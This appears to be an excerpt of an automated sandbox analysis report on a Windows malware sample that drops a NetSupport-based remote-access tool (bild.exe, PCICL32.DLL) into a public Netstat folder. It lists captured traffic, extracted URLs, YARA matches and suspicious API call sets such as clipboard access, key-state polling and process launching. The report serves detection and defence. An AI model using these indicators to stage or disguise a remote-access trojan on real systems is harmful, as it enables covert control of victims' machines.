0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:47:56 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f721378cfad7295-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZuyri2NnFtYmfqTdNlP6gWjMRy%2B7Q%2FarxYesHy1LblTvdkZkY0sUstwcZC9GaC1ryEeizxLVy81a8Z406fWBHmbgmxS2rn0TzLSzip2DxQA0XzVOkmfRg6R8A6cSwJUAVTTI3xQVbaEyWks"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: bild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspV
                                Source: bild.exe, 00000006.00000002.3898386960.00000000010AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp_
                                Source: bild.exe, 00000006.00000002.3898386960.00000000010C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspo
                                Source: bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspt
                                Source: bild.exe, 00000006.00000002.3898386960.00000000010CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp~
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005192000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,6_2_11032EE0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F6B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,7_2_11032EE0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,6_2_110321E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,6_2_110076F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11113880
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,7_2_11113880
                                Source: Yara matchFile source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.4fbb800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 1100, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7216, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7388, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7612, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_111158B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,7_2_111158B0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003C7070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_003C7070
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,6_2_1115DB40
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D330
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D59840_2_003D5984
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003C84090_2_003C8409
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CE0450_2_003CE045
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D30E60_2_003D30E6
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003EE8D40_2_003EE8D4
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DE94A0_2_003DE94A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CD1D20_2_003CD1D2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CBA1A0_2_003CBA1A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003C32030_2_003C3203
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DF25E0_2_003DF25E
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DFAC80_2_003DFAC8
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D2B3A0_2_003D2B3A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E2B780_2_003E2B78
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003EA35E0_2_003EA35E
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D63F20_2_003D63F2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CDBE20_2_003CDBE2
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CEC970_2_003CEC97
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D5DB90_2_003D5DB9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D2DB50_2_003D2DB5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CD5E40_2_003CD5E4
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DEE460_2_003DEE46
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E9EB00_2_003E9EB0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003C5E960_2_003C5E96
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DF6930_2_003DF693
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003C276C0_2_003C276C
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D4FB50_2_003D4FB5
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003C3FC50_2_003C3FC5
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110733B06_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110295906_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11061C906_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110330106_2_11033010
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111632206_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102B5F06_2_1102B5F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111674856_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110454F06_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101B7606_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111258B06_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101BBA06_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11087C606_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110700906_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110804806_2_11080480
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115E9806_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101C9C06_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110088AB6_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11050D806_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5DA9806_2_6C5DA980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C603DB86_2_6C603DB8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C6039236_2_6C603923
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C6049106_2_6C604910
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5DDBA06_2_6C5DDBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5E84F06_2_6C5E84F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C6045286_2_6C604528
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5D17606_2_6C5D1760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5FD70F6_2_6C5FD70F
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C60A0636_2_6C60A063
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C6041566_2_6C604156
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11061C907_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110330107_2_11033010
